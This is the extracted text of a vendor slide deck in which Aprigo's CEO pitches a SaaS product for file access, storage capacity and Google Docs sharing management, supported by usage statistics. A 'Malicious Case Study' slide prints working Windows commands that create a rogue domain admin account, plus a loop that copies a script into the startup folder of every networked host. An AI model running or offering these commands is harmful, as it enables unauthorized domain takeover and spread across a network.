winning the war against data- strategies to beat your arch nemesis: files - gil zimmerman, aprigo

TM

Microsoft BizSpark

Startup of the Day!

Winning the war against dataStrategies to beat your arch nemesis: files.

Gil Zimmermann, CEO & Co-Founder

On-Premise & Cloud Data (read: files) Identify & Act

Access and Storage Control

Attention:Your Data Hates You!

Aprigo IT Benchmark

• SaaS offering

• Over 1,000 companies using Aprigo

• Over 750TBs under management

• Exposure at 95%

• Cost savings potential at 71%

• Installs in under 5 minutes

Data Deluge is a Problem

• Files exploding everywhere

• 75-90% of all data is unstructured (files)

• Valuable business asset

• Touched by everyone

• Vulnerable & exposed

• Expensive to manage

IT Owns the Data Problem

Data DelugeData UsersCompliance & RegulationBusiness Data Dependence

=IT BudgetsIT HeadcountNo Mid-Market Solutions

~∅

IT FiresExposureDisruptionWaste

Access Problem Math• ACLs allow 13 different rights to access an object

• 12 practical combinations of ACE settings

• Permissions can be granted or denied

• 2^13*12 = 98,304 different access rights you can define

• Can be applied to a user/group to form an ACE, unlimited number of ACEs can be combined into an ACL

• Each file/folder can be attached to a different ACL

• Millions of files, hundreds/thousands of users

• Business needs to know who has access to what

Access Best Practices• Typical Exposure (95+%)

• Everyone (66%)

• Domain Users (45%)

• Explicit Permissions (92%)

• Don't over-organize your users, use inheritance

• Rogue Users

• Local Admins (99%)

• Outsiders are a new threat on Google Docs (98%)

• Talk in business terms (exposure, audit, risk, etc)

Access Use Cases

• IT Audits

• Help-Desk

• Active Directory Migrations

• IT GRC

• Data Breaches

• Data Forensics

• Entitlement Reporting

Capacity Best Practices• Start with the obvious:

• Untouched in 90 days (81%)

• Media files (35%) vs. documents (16%)

• Large files over 100MBs (49%)

• Gets harder every time, so dig deeper

• Orphaned files (by owner)

• Small files that multiply

• Talk in business terms ($/GB, overhead, etc.)

Capacity Use Cases

• Disk Full

• Data Center Consolidation

• Data Migration

• Storage Refresh

• Backup/Replication Window Failure

• Chargeback

• Tiering

Storage Planning

• Understanding the data composition

• Capacity

• Cost (primary & secondary)

• Growth rate

• Ownership

• Data-intensive initiatives

• Reclaim costs by better utilization

Google Docs Best Practices

• Basic settings

• Enable/disable sharing

• Set up alerts for external sharing

• Hope for the best...

• Google Apps APIs

• Dashboard plugin

• Discover new shares on your network

• Network Share tab

• Preliminary access view

• Capacity utilization

• Available on any network share

• Find exposure & savings w/Aprigo NINJA

Spiceworks Integration

Spiceworks Plug-in

Innocent Case Study• Bill the CFO owns the Finance share

• \\ACMESRV\Finance\Secrets contains some of the company’s most sensitive data

• Bill and his group have access

• ‘Domain Users’ is the default permission

• All employees have access

• Those with access can share...

Malicious Case Study• BUILTIN\Administrators

• 2 Line script to get to DOMAIN\Administrators

• net user /domain /add rogueuser roguepass

• net group /domain "Domain Admins" /add rogueuser

• 1 more line to total network access

• for /F %%i in ('net view') do copy /Y %0 "%%i\c$\documents and settings\all users\start menu\programs\startup"

Aprigo’s Approach

DataDashboard

Reports & Audits

! Alerts & Monitoring

Aprigo Cloud Infrastructure

Capacity Management

AccessManagement

gDocsManagement

AccessAuditing

CostCalculator

ITBenchmark Go-FIX ISV Apps

CustomerIntegrations

Traditional Data Management

LAN

IT EnvironmentServer

NAS Appliances(NetApp / EMC)

WindowsFile ServersActive

DirectoryMetadataCollector

UI

ApplicationServers

AnalyticsServers

DatabaseServers

SAN

Network Shares

Web Services

AgentsAgents

AgentsAgents

AgentsAgents

SaaS Data Management

LAN

IT Environment

THE APRIGO SOLUTION (Single SIte)

Aprigo Back-End(SAS70-II Data Center)

Web Services

ApplicationServers

AnalyticsServers

DatabaseServers

SAN

Encrypted HTTPS Traffic

NAS Appliances(NetApp / EMC)

WindowsFile ServersActive

Directory MetadataCollector

NINJA / UINetwork Shares

Data Dashboard

Capacity Management

Access Management

Access Auditing

IT Benchmarking

Google Docs Access

Q & A

• Functionality

• Technology

• Plug-in

• On-Premise vs. Cloud

• Suggestions/Thoughts

• etc...

Thank You!

Customer Segments

Education Financials Health

IT ConsultantsTechOil

Commercial LandscapeLo

w C

ost

/ E

ase

-of-

use

/ S

cala

bili

ty

Complete Solution / Functionality

SaaS / Cloud

Aprigo is the only SaaS solution. Running in minutes, globally.

Risk &

Governance

Storage &

Data Mgmt

Homegrown

Leaders

Commodity